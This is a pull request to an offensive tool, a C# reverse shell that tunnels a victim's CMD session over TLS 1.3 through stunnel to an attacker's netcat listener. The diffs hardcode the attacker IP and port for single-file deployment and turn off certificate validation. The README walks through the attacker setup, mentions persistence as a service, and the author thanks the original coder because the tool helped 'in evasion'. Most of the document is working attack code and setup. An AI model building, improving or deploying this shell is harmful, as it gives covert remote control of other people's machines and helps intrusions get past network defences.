### PR TITLE
Code refectroing, implemented TLS 1.3

### DIFF
--- a/README.md
+++ b/README.md
@@ -85,7 +85,7 @@ Executing Program.exe we should read the following on the shell
 	Remote cert was issued to CN=xxxxxx ......
 The you shoud get a CMD shell on the attacker
 
-## Exception use cases: missing server connection
+## Exception: missing server connection
 ### nc is not listening on the server
 Since the client app can connect to Stunnell but not to nc, it will continue to send requests to the server. You will see on the console the certificate info looping:
 	

--- a/README.md
+++ b/README.md
@@ -106,8 +106,6 @@ In this case the client will keep to try to connect to Stunnel. You won't get th
 	Using the following connection 192.168.1.7:9999
 As soon as the client can connect to Stunnel the app will switch to the previous state (looping certificate info printend on the screen). If nc listener is also started on the server you will get a shell.
 
-## Persistence
-You can use the app as a service
 
 ## Trouble shooting on Kali
 If you get the following error re-starting stunnel:

--- a/README.md
+++ b/README.md
@@ -13,7 +13,7 @@ Server is the attacker running stunnel4. Follows the configuration:
 	client = no
 	accept = 9999
 	connect = 127.0.0.1:6666
-	cert = /etc/stunnel/lguerra.pem
+	cert = /etc/stunnel/stunnel.pem
 	
 	 
 Here we set stunnel listening for incoming connection on port 9999. This connection is encrypted, then forwards the stream  to port 6666 where we will have nc listening. This flow is not encrypted of course.

--- a/README.md
+++ b/README.md
@@ -6,11 +6,6 @@ A Reverse shell through Stunnel.
 
 ## Scenario:
 Client is the victim, that executes the connection to the server (attacker) that serves stunnell.
-The client SSL authentication must match the CN specified creating the server certificate (example: lguerra.local)
-
-    sslStream.AuthenticateAsClient("lguerra.local");
-	
-	
 Server is the attacker running stunnel4. Follows the configuration:
 	
 	cat /etc/stunnel/stunnel.conf 
@@ -20,8 +15,8 @@ Server is the attacker running stunnel4. Follows the configuration:
 	connect = 127.0.0.1:6666
 	cert = /etc/stunnel/lguerra.pem
 	
-	
-Here we have stunnel listening for incoming connection on port 9999, then forwards the connection to port 6666 where we will have nc listening.
+	 
+Here we set stunnel listening for incoming connection on port 9999. This connection is encrypted, then forwards the stream  to port 6666 where we will have nc listening. This flow is not encrypted of course.
 
 ## Create the certificate on the server
 	
@@ -29,12 +24,26 @@ Here we have stunnel listening for incoming connection on port 9999, then forwar
 	openssl req -new -x509 -key key.pem -out cert.pem -days 1095
 	cat key.pem cert.pem > /etc/stunnel/stunnel.pem
  
-The CN value must be used to authenticate the client as previously indicated.
 Start stunnell
-	
- service stunnel4 start
+
+	service stunnel4 start
 	
 Check if works:
+
+	sudo service stunnel4 status
+	● stunnel4.service - LSB: Start or stop stunnel 4.x (TLS tunnel for network daemons)
+	     Loaded: loaded (/etc/init.d/stunnel4; generated)
+	     Active: active (running) since Tue 2024-05-21 22:11:47 CEST; 5s ago
+	       Docs: man:systemd-sysv-generator(8)
+	    Process: 133285 ExecStart=/etc/init.d/stunnel4 start (code=exited, status=0/SUCCESS)
+	      Tasks: 3 (limit: 9398)
+	     Memory: 4.2M (peak: 4.6M)
+	        CPU: 241ms
+     	CGroup: /system.slice/stunnel4.service
+             └─133301 /usr/bin/stunnel4 /etc/stunnel/stunnel.conf
+
+
+Verify stunnell port is listening:	
 
     netstat -tulp | grep 9999
 	  Active Internet connections (only servers)
@@ -46,25 +55,73 @@ Then we can lunch nc to listen on port 6666 as configurated on stunnel
 
 	nc -lvp 6666
 	
-## Compile the client:
+## Configure the client
+Set the Stunnell server and port around line 50:
+
+	//CONFIG THIS: point to the Stunell server
+        string IP = "192.168.1.2";
+        int PORT = 9999;
+## TLS configuration
+The client use TLS 1.3 (teseted on windows 11) to connect to the server:
+
+	sslStream.AuthenticateAsClient("host.local", 
+		new X509CertificateCollection(), 
+		SslProtocols.Tls13, 
+		false);
+
+## Compile the client
 Youn can compile the client as follows:
 
 	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe STunnel_RevShell.cs
 	
-The configuration file (config) must be present in the same directory of the executable file and must contain the following information:
-
-	ip:<attacker machine IP>
-	port:<listen stunnel port on the attacker machine>
-	CN:<CN name as set on the stunnel certificate> 
-
 	
 Executing Program.exe we should read the following on the shell
 
-	STunnel_RevShell.exe 	
-		Starting decoding, please wait...
-		Certificate revocation list checked: False
-		...
-The you shoud get a CMD shell on the attacker
+	ver 1.0 Coded by GuerraIT
+	ver 1.1 Modified by Zinzloun (support TLS 1.3)
 	
+	Using the following connection 192.168.1.7:9999
+	Certificate revocation list checked: False
+	Remote cert was issued to CN=xxxxxx ......
+The you shoud get a CMD shell on the attacker
+
+## Missing server connection
+### nc is not listening on the server
+The client app continues to send requests to the server, you will see on the console the certificate info looping:
+	
+ 	...
+	Certificate revocation list checked: False
+	Remote cert was issued to CN=xxxx....
+	Certificate revocation list checked: False
+	Remote cert was issued to CN=xxxx....
+ 	Certificate revocation list checked: False
+	Remote cert was issued to CN=xxxx....
+	...
+At soon as the nc listener is started on the server the client will connect immediately, stopping to print the certificate information and you should get the shell.
+## Stunnell is not listening on the server
+In this case the client will keep to try to connect to the server. You won't get the certificate information printed in this case:
+
+	...
+	Using the following connection 192.168.1.7:9999
+As soon as sconnect will start the app will connect to the server, switching to the previous state (looping certificate info printend on the screen). If nc listener is also started you will get a shell
+
+## Persistence
+You can use the app as a service
+
+## Trouble shooting on Kali
+If you get the following error re-starting stunnel:
+
+	sudo service stunnel4 status
+	...
+ 	Active: failed (Result: exit-code) since Tue 2024-05-21 22:04:54 CEST; 2min 21s ago
+  	stunnel4.service: Failed with result 'exit-code'.
+	stunnel4.service: Unit process 52254 (stunnel4) remains running after unit stopped.
+
+It seems a bug on Debian related to the PID file, to solve try to manually kill the related process 
+
+ 	sudo kill -9 52254
+
+Then restart the service
+
 		
 

--- a/README.md
+++ b/README.md
@@ -85,7 +85,7 @@ Executing Program.exe we should read the following on the shell
 	Remote cert was issued to CN=xxxxxx ......
 The you shoud get a CMD shell on the attacker
 
-## Exceptions use case: missing server connection
+## Exception use cases: missing server connection
 ### nc is not listening on the server
 Since the client app can connect to Stunnell but not to nc, it will continue to send requests to the server. You will see on the console the certificate info looping:
 	

--- a/README.md
+++ b/README.md
@@ -85,9 +85,9 @@ Executing Program.exe we should read the following on the shell
 	Remote cert was issued to CN=xxxxxx ......
 The you shoud get a CMD shell on the attacker
 
-## Missing server connection
+## Exceptions use case: missing server connection
 ### nc is not listening on the server
-The client app continues to send requests to the server, you will see on the console the certificate info looping:
+Since the client app can connect to Stunnell but not to nc, it will continue to send requests to the server. You will see on the console the certificate info looping:
 	
  	...
 	Certificate revocation list checked: False
@@ -97,13 +97,14 @@ The client app continues to send requests to the server, you will see on the con
  	Certificate revocation list checked: False
 	Remote cert was issued to CN=xxxx....
 	...
-At soon as the nc listener is started on the server the client will connect immediately, stopping to print the certificate information and you should get the shell.
-## Stunnell is not listening on the server
-In this case the client will keep to try to connect to the server. You won't get the certificate information printed in this case:
+At soon as the nc listener is started on the server the client will connect immediately, stopping to print the certificate information; you will get the shell.
+
+## Stunnell service is not reachable
+In this case the client will keep to try to connect to Stunnel. You won't get the certificate information printed in this case, only the following line:
 
 	...
 	Using the following connection 192.168.1.7:9999
-As soon as sconnect will start the app will connect to the server, switching to the previous state (looping certificate info printend on the screen). If nc listener is also started you will get a shell
+As soon as the client can connect to Stunnel the app will switch to the previous state (looping certificate info printend on the screen). If nc listener is also started on the server you will get a shell.
 
 ## Persistence
 You can use the app as a service

--- a/STunnel_RevShell.cs
+++ b/STunnel_RevShell.cs
@@ -51,7 +51,7 @@ ver 1.1 Modified by Zinzloun (support TLS 1.3)
                 string IP = "192.168.1.2";
                 int PORT = 9999;
 
-                Console.Writeline("Using the following connection " + IP + ":" + PORT);
+                Console.WriteLine("Using the following connection " + IP + ":" + PORT);
 
                 //spawn the reverse shell
                 ReverseShell_SSL rS = new ReverseShell_SSL(IP, PORT);

--- a/STunnel_RevShell.cs
+++ b/STunnel_RevShell.cs
@@ -38,47 +38,30 @@ namespace ReverseShell2_SSL
 /\__/ / | | |_| | | | | | | |  __/ | | |\ \  __/\ V / (   / | | |  __/ | |
 \____/  \_/\__,_|_| |_|_| |_|\___|_| \_| \_\___| \_/   |_||_| |_|\___|_|_|
                                                                           
-ver 1.0 Coded by GuerraIT                               
+ver 1.0 Coded by GuerraIT
+ver 1.1 Modified by Zinzloun (support TLS 1.3)                           
 
                 
             ");
+ 
+           
+            try
+            {
+               //CONFIG THIS: point to the Stunell server
+                string IP = "192.168.1.2";
+                int PORT = 9999;
 
+                Console.Writeline("Using the following connection " + IP + ":" + PORT);
 
-            
-            Console.WriteLine(@"Starting decoding, please wait...");
-            Thread.Sleep(3000);
-
-            ReverseShell_SSL rS;
-            //check if there is the config file
-            string configF = "config";
-
-            if (File.Exists (configF)) {
-
-                string ip, port, cn_name;
-                try
-                {
-                    //read param in config
-                    string[] lines = File.ReadAllLines(configF);
-
-                    ip = lines[0].Split(':')[1];
-                    port = lines[1].Split(':')[1];
-                    cn_name = lines[2].Split(':')[1];
-
-
-                    //spawn the reverse shell
-                    rS = new ReverseShell_SSL(ip, Int32.Parse(port), cn_name);
-                }
-                catch (Exception) {
-
-                    Console.WriteLine(@"An error occured decoding the file: param reading: check the config file. Procudere aborted");
-                    Thread.Sleep(5000);
-                }
+                //spawn the reverse shell
+                ReverseShell_SSL rS = new ReverseShell_SSL(IP, PORT);
             }
-            //no config file
-            else {
-                Console.WriteLine(@"An error occured: missing config file. Procudere aborted");
+            catch (Exception) {
+
+                Console.WriteLine(@"An error occured decoding the file: param reading: check the config file. Procudere aborted");
                 Thread.Sleep(5000);
             }
+           
          }
 
         
@@ -95,18 +78,18 @@ ver 1.0 Coded by GuerraIT
         Process processCmd;
         StringBuilder strInput;
 
-        public ReverseShell_SSL(string RHost,Int32 Port, string CN) {
+        public ReverseShell_SSL(string RHost,Int32 Port) {
 
             for (; ; )
             {
-                RunServer(RHost,Port,CN);
+                RunServer(RHost,Port);
                 Thread.Sleep(3000); //Wait 3 seconds
             }
 
         }
 
 
-        private void RunServer(string rhost, Int32 port, string CN)
+        private void RunServer(string rhost, Int32 port)
         {
             tcpClient = new TcpClient();
             strInput = new StringBuilder();
@@ -123,9 +106,12 @@ ver 1.0 Coded by GuerraIT
                         new RemoteCertificateValidationCallback(ValidateServerCertificate),
                         null
                         );
-                    // The server name must match the name on the server certificate (CN value)
-                    sslStream.AuthenticateAsClient(CN);
-
+                    // Since we are not validating the certificate, we can pass as CN whatever we like (here host.local).
+                    // Otherwise the value must match the CN of STunnel's certificate
+                   sslStream.AuthenticateAsClient("host.local", 
+	                    new X509CertificateCollection(), 
+	                    SslProtocols.Tls13, 
+	                    false);
                     DisplayCertificateInformation(sslStream);
 
                     //networkStream = tcpClient.GetStream();

--- a/STunnel_RevShell.cs
+++ b/STunnel_RevShell.cs
@@ -40,29 +40,20 @@ namespace ReverseShell2_SSL
                                                                           
 ver 1.0 Coded by GuerraIT
 ver 1.1 Modified by Zinzloun (support TLS 1.3)                           
-
-                
-            ");
- 
+	");
+		
            
-            try
-            {
-               //CONFIG THIS: point to the Stunell server
-                string IP = "192.168.1.2";
-                int PORT = 9999;
+       //CONFIG THIS: point to the Stunell server
+	string IP = "192.168.1.2";
+	int PORT = 9999;
 
-                Console.WriteLine("Using the following connection " + IP + ":" + PORT);
+	Console.WriteLine("Using the following connection " + IP + ":" + PORT);
 
-                //spawn the reverse shell
-                ReverseShell_SSL rS = new ReverseShell_SSL(IP, PORT);
-            }
-            catch (Exception) {
-
-                Console.WriteLine(@"An error occured decoding the file: param reading: check the config file. Procudere aborted");
-                Thread.Sleep(5000);
-            }
+	//spawn the reverse shell
+	ReverseShell_SSL rS = new ReverseShell_SSL(IP, PORT);
            
-         }
+           
+        }
 
         
     }

--- a/STunnel_RevShell.cs
+++ b/STunnel_RevShell.cs
@@ -12,6 +12,7 @@ using System.Net;
 using System.Runtime.InteropServices;
 using System.Security.Cryptography.X509Certificates;
 using System.Net.Security;
+using System.Security.Authentication;
 
 namespace ReverseShell2_SSL
 {
@@ -41,21 +42,21 @@ namespace ReverseShell2_SSL
 ver 1.0 Coded by GuerraIT
 ver 1.1 Modified by Zinzloun (support TLS 1.3)                           
 	");
-		
-           
-       //CONFIG THIS: point to the Stunell server
-	string IP = "192.168.1.2";
-	int PORT = 9999;
 
-	Console.WriteLine("Using the following connection " + IP + ":" + PORT);
 
-	//spawn the reverse shell
-	ReverseShell_SSL rS = new ReverseShell_SSL(IP, PORT);
-           
-           
+            //CONFIG THIS: point to the Stunell server
+            string IP = "192.168.1.2";
+            int PORT = 9999;
+
+            Console.WriteLine("Using the following connection " + IP + ":" + PORT);
+
+            //spawn the reverse shell
+            ReverseShell_SSL rsss = new ReverseShell_SSL(IP, PORT);
+
+
         }
 
-        
+
     }
 
     class ReverseShell_SSL
@@ -69,12 +70,13 @@ ver 1.1 Modified by Zinzloun (support TLS 1.3)
         Process processCmd;
         StringBuilder strInput;
 
-        public ReverseShell_SSL(string RHost,Int32 Port) {
+        public ReverseShell_SSL(string RHost, Int32 Port)
+        {
 
             for (; ; )
             {
-                RunServer(RHost,Port);
-                Thread.Sleep(3000); //Wait 3 seconds
+                RunServer(RHost, Port);
+                Thread.Sleep(3000); //Wait 3 seconds and retry
             }
 
         }
@@ -99,10 +101,10 @@ ver 1.1 Modified by Zinzloun (support TLS 1.3)
                         );
                     // Since we are not validating the certificate, we can pass as CN whatever we like (here host.local).
                     // Otherwise the value must match the CN of STunnel's certificate
-                   sslStream.AuthenticateAsClient("host.local", 
-	                    new X509CertificateCollection(), 
-	                    SslProtocols.Tls13, 
-	                    false);
+                    sslStream.AuthenticateAsClient("host.local",
+                         new X509CertificateCollection(),
+                         SslProtocols.Tls13,
+                         false);
                     DisplayCertificateInformation(sslStream);
 
                     //networkStream = tcpClient.GetStream();
@@ -182,7 +184,7 @@ ver 1.1 Modified by Zinzloun (support TLS 1.3)
               X509Chain chain,
               SslPolicyErrors sslPolicyErrors)
         {
-            
+
 
             // validate all the certificate
             return true;


### PR DESCRIPTION
Ciao Lucio,

I did some modifications as indicated in the README file. To summarize:
- Removed the config file, now the parameters IP and PORT are hardcoded. It's more pratical in real scenario to deploy one file
- Removed the CN parameter, since it's not necessary
- Implemented TLS 1.3. By default the application used TLS 1.2, but it involvs error with the last verions of STunnel

Thanx for this stuff, it was really helping in evasion!

@salut :)